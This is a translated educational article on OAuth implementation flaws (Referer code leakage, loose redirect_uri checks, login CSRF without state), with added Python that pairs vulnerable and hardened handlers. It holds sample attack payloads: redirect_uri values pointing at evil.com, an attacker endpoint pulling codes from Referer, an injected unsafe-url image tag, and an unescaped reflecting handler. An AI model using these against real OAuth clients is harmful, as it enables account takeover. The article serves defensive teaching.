OAuth vulnerabilities | How to implement secure authorization in your web application

Anonymous

This article looks at the known OAuth vulnerabilities. Readers will learn how to implement reliable, secure authorization in a web application.

OAuth is a secure protocol, but its actual level of security depends on how well web developers understand it when they implement authorization. That makes this topic especially important for information security specialists, who have to provide a high level of protection for their users' accounts. It is time to get acquainted with the techniques that help reduce the risk of an OAuth compromise.

Introduction

The OAuth 2.0 protocol is now used widely across many applications. It gives users a convenient experience, with simpler authentication and authorization than the traditional username-and-password login. Implemented properly and thoughtfully, OAuth protects authorization as a matter of course, because users do not have to hand their account credentials to a particular application in order to grant it access. Users increasingly prefer to sign in with their Google, Facebook or LinkedIn accounts rather than create a new account every time they register on a website. In that sense the OAuth protocol genuinely makes our lives easier.

In general, the well-known OAuth providers are very reliable. Signing in with a Google or Facebook account does improve the security picture. The protocol has been tested carefully by experts, and any vulnerabilities that do surface are usually fixed quickly by the vendor's security team. Nevertheless, the feeling of complete security can be deceptive.

OAuth providers give developers plenty of reasons to trust the security of their systems. However, a service that uses OAuth but implements it incorrectly in its own login flow can be an easy target for an intruder, and such mistakes lead to theft of user data.

Below we look at the most common vulnerabilities faced by third-party applications that use OAuth to authorize their users. Keep in mind that the protocol itself is secure and reliable; only an incorrect implementation exposes it to attack.

OAuth token theft using the Referer header

When an application requests authorization for a user from the OAuth server, the user is issued an authorization code, which the application sends back to the server in the next step to exchange it for a token. If, during this process, the user is taken from the page whose URL carries the code to another page, the code appears in the Referer header of the HTTP request. The code thus lands on an external website, which puts the user's data at the OAuth server at risk.

Note: the Referer header is an HTTP request header that carries the URL of the page from which the request is being sent.

To mitigate this vulnerability, the developer must make sure the application has no HTML injection. If an injection point exists, an attacker can simply plant an image tag pointing at his own web server and find a way to send the user to the page that contains it. He then gets the chance to steal the code from the Referer header of the HTTP request. Note that current browsers default to a strict-origin-when-cross-origin referrer policy, which sends only the origin on cross-origin requests, but an injected element can carry referrerpolicy="unsafe-url" and re-enable the leak; rather than relying on the default, send Referrer-Policy: no-referrer and redirect away from the code-bearing URL as soon as the code has been consumed.
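The following is an added example, not code from the original article: an OAuth callback handler written the vulnerable way (an HTML page served at the code-bearing URL that reflects a query parameter unescaped) beside a hardened version (the code is consumed server-side, the response is a 303 to a code-free URL with Referrer-Policy: no-referrer, and any reflected text is escaped). The hosts, the exchange_code stand-in and the browser_fetch_headers model of what a browser puts in Referer under a given policy are all assumptions constructed for this example.

```python
from html import escape
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical hosts used throughout this example.
APP_CALLBACK = "https://app.example.com/callback"
ATTACKER_COLLECTOR = "https://evil.com/collect"


def exchange_code(code: str) -> str:
    """Stand-in for the back-channel code-for-token request (assumption:
    a real implementation POSTs the code to the OAuth server's token
    endpoint and receives an access token)."""
    return "token-for-" + code


def vulnerable_callback(query: str):
    """Serves an HTML page *at* the code-bearing URL and reflects the
    user-controlled 'name' parameter without escaping.  An injected
    <img referrerpolicy="unsafe-url" src="https://evil.com/collect">
    makes the browser fetch the attacker host with the full page URL,
    code included, in the Referer header.  Returns (status, headers, body)."""
    params = parse_qs(query)
    name = params.get("name", [""])[0]
    body = f"<h1>Welcome {name}</h1><p>Finishing login...</p>"
    return 200, {"Content-Type": "text/html"}, body


def hardened_callback(query: str):
    """Consumes the code server-side, then leaves the code-bearing URL with
    a 303 and a no-referrer policy.  Nothing untrusted is rendered here."""
    params = parse_qs(query)
    code = params.get("code", [""])[0]
    name = params.get("name", [""])[0]
    token = exchange_code(code)
    headers = {
        "Location": "/account?" + urlencode({"name": name}),
        "Referrer-Policy": "no-referrer",
        "Set-Cookie": f"session={token}; HttpOnly; Secure; SameSite=Lax",
    }
    return 303, headers, ""


def account_page(name: str) -> str:
    """The page the hardened flow lands on: reflected text is escaped, so an
    injected tag is rendered as text instead of being fetched."""
    return f"<h1>Welcome {escape(name)}</h1>"


def attacker_collect(request_headers: dict):
    """What the attacker's /collect endpoint does: pull the authorization
    code out of the Referer header, if the browser sent the full URL."""
    referer = request_headers.get("Referer", "")
    code = parse_qs(urlsplit(referer).query).get("code")
    return code[0] if code else None


def browser_fetch_headers(page_url: str, policy: str) -> dict:
    """Constructed model of the Referer a browser sends on a cross-origin
    fetch made from page_url under the given referrer policy."""
    parts = urlsplit(page_url)
    if policy == "no-referrer":
        return {}
    if policy == "strict-origin-when-cross-origin":  # browser default
        return {"Referer": f"{parts.scheme}://{parts.netloc}/"}
    if policy == "unsafe-url":  # what an injected referrerpolicy attribute asks for
        return {"Referer": page_url}
    raise ValueError("policy not modelled: " + policy)
```

The point of the split into two handlers is that escaping alone is not enough: as long as a page is served at a URL that contains the code, any outbound request from that page is a potential leak, so the hardened version never serves a page there at all.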

OAuth token theft using the redirect_uri parameter

The application starts the authorization process by sending a request to the OAuth server:

https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful

The request usually contains a redirect_uri parameter, which the OAuth server uses to deliver the code or token after the user has given consent. If the value of this parameter is not controlled, or is checked carelessly, it can easily be replaced so that the response is redirected to the attacker's own website, where a special handler forwards the token to him and he gains access to the protected resource.

https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com

Sometimes the redirect URLs are whitelisted. An attacker can then route the captured data through an open redirect on a whitelisted host, like this:

https://www.example.com/oauth20_authorize.srf?[...]

Or:

https://www.example.com/oauth2/authorize?[...]

When implementing OAuth, do not put whole domains on the whitelist. Only a few exact URLs should be accepted as redirect_uri, and the application must not contain an open redirect.
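As an added example (not code from the original article), here is a loose redirect_uri check of the kind the two attacks above bypass, beside an exact-match allowlist check, plus a model of how an open redirector on a whitelisted host forwards a token. The allowlisted callback follows the article's example URL; the /redirect?url= endpoint, the implicit-grant delivery model and the hosts are assumptions made for this example.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist: the one callback this client registered.
ALLOWED_REDIRECT_URIS = {"https://demo.example.com/loginsuccessful"}


def loose_redirect_check(uri: str) -> bool:
    """The kind of check that gets bypassed: accepts anything under the
    company domain, plus 'localhost' for developer convenience.  A host
    named localhost.evil.com and an open redirector on a real subdomain
    both pass."""
    parts = urlsplit(uri)
    host = parts.hostname or ""
    return parts.scheme == "https" and (
        host == "example.com"
        or host.endswith(".example.com")
        or host.startswith("localhost")
    )


def strict_redirect_check(uri: str) -> bool:
    """Exact match on scheme, host, port and path; no query string, no
    fragment, no userinfo, no dot segments.  urlsplit does not normalise
    '..' so it is rejected rather than resolved."""
    parts = urlsplit(uri)
    if parts.scheme != "https" or parts.query or parts.fragment:
        return False
    if parts.username is not None or parts.port not in (None, 443):
        return False
    if any(seg in (".", "..") for seg in parts.path.split("/")):
        return False
    return f"https://{parts.hostname}{parts.path}" in ALLOWED_REDIRECT_URIS


def deliver_token(redirect_uri: str, access_token: str) -> str:
    """Constructed model of implicit-grant delivery through a hypothetical
    open redirector at /redirect?url=... on an allowlisted host.  The OAuth
    server appends the token in the URL fragment; when the redirector
    answers with a Location that has no fragment, the browser carries the
    original fragment along (RFC 7231 section 7.1.2), so the token lands
    on whatever host 'url' named.  Returns the URL the browser ends up on."""
    landing = redirect_uri
    parts = urlsplit(redirect_uri)
    if parts.path == "/redirect":
        target = parse_qs(parts.query).get("url")
        if target:
            landing = target[0]
    return f"{landing}#access_token={access_token}"
```

Exact matching is the only check that survives all three bypasses (lookalike host, query-string smuggling, path traversal); the open-redirector model shows why the allowlisted host itself must not forward to arbitrary URLs.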

Cross-site request forgery

Cross-site request forgery becomes possible when an attacker succeeds in getting the victim to click his link and thereby issue a request the victim would not otherwise have made. CSRF is usually countered with a CSRF token bound to the user's session, which lets the application verify who sent the request. In the OAuth protocol, the state parameter plays the role of the CSRF token.

It is worth looking at how a CSRF attack works against OAuth and how the state parameter can be used to mitigate it.

The hacker opens the web application and starts the process of authorizing it to access the service provider via OAuth. The application asks the service provider for the access it needs, and the hacker is redirected to the service provider's site, where he would normally enter his username and password to authorize that access. He does so with his own account, but instead of letting the browser complete the flow he intercepts the redirect back to the application and saves its URL, which carries the authorization code issued for his account. The hacker then gets the victim to open that URL in some way. If the victim is logged in to the application, the victim's session is used to submit the hacker's code, and the application exchanges it for an access token. The hacker's service-provider account is now linked to the victim's account in the application, so by signing in through the service provider the hacker gains access to the victim's account.

So how do you prevent this scenario using the state parameter?

The application must generate a value tied to the user's session (for example, derived from the user's session key). What exactly it is matters less than that it is unique and produced from secret information about the original user. This value is assigned to the state parameter.

The value travels to the service provider with the authorization request and comes back unchanged on the redirect. Now the hacker invites the victim to open the URL he saved.

The authorization code is issued and sent to the client together with the state parameter.

The client regenerates the expected value from its own session data and compares it with the state value that came back with the authorization response. The two do not match, because the expected value was derived solely from the current session (the victim's), while the returned state was produced in the hacker's session. The received code is therefore rejected.

Other vulnerabilities that may arise in an OAuth implementation include cross-site scripting (XSS) through the redirect_uri parameter, and authorization codes that can be exchanged more than once to issue several tokens. These are less common than the ones described above, but no less dangerous. A developer must know every procedure needed to guarantee the reliable operation of the web application.
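The state mechanism described in the preceding paragraphs, as an added example that is not part of the original article: the client mints a state bound to the browser's session with an HMAC, the provider (modelled here) echoes it back with the code, and the callback recomputes the expected value from the current session before accepting the code. login_csrf_attempt replays the attack from the text with the hacker's saved callback URL. The endpoints, client_id and the per-run SERVER_KEY are assumptions; the nonce is an addition to the article's scheme so that each authorization request gets a distinct state.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical endpoints and a server-side key generated for this run.
AUTHORIZE_ENDPOINT = "https://www.example.com/signin/authorize"
CLIENT_CALLBACK = "https://app.example.com/callback"
SERVER_KEY = secrets.token_bytes(32)


def _mac(session_id: str, nonce: str) -> str:
    return hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def make_state(session_id: str) -> str:
    """state = nonce.HMAC(server_key, session_id:nonce).  The nonce makes
    each authorization request distinct; the MAC binds the state to the
    session, so nobody without the key and that session can mint one."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def check_state(session_id: str, state: str) -> bool:
    """Recompute the MAC from the *current* session and compare in constant
    time.  A state minted for another session, or a malformed one, fails."""
    nonce, sep, mac = state.partition(".")
    if not sep or not nonce:
        return False
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def authorization_url(session_id: str) -> str:
    """Step 1: the client sends the browser to the provider with state."""
    query = urlencode({
        "response_type": "code",
        "client_id": "demo-client",  # hypothetical
        "redirect_uri": CLIENT_CALLBACK,
        "state": make_state(session_id),
    })
    return f"{AUTHORIZE_ENDPOINT}?{query}"


def provider_consent(authorize_url: str, code: str) -> str:
    """Step 2 (provider side, modelled): after consent the provider sends the
    browser back to redirect_uri with the issued code and the unchanged state."""
    params = parse_qs(urlsplit(authorize_url).query)
    return CLIENT_CALLBACK + "?" + urlencode({"code": code, "state": params["state"][0]})


def handle_callback(session_id: str, callback_url: str):
    """Step 3: the client accepts the code only if the state matches the
    session of the browser delivering it.  Returns the code to exchange,
    or None when the request is rejected."""
    params = parse_qs(urlsplit(callback_url).query)
    state = params.get("state", [""])[0]
    code = params.get("code", [""])[0]
    if not code or not check_state(session_id, state):
        return None
    return code


def login_csrf_attempt():
    """The attack from the text: the hacker completes consent in his own
    session, keeps the callback URL instead of loading it, and gets the
    victim's browser (carrying the victim's session cookie) to open it."""
    hacker_session, victim_session = "sess-hacker", "sess-victim"
    stolen_callback = provider_consent(authorization_url(hacker_session), "CODE-FOR-HACKER-ACCOUNT")
    return handle_callback(victim_session, stolen_callback)
```

Because the state is recomputed from the session that presents it rather than looked up, the check needs no server-side storage; if single-use states are also required, store the nonce in the session when it is minted and clear it in handle_callback.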

Author of the translated article: Simon Saliba.

Important! The information is provided for educational purposes only. Please comply with the law and do not use this information for illegal purposes.
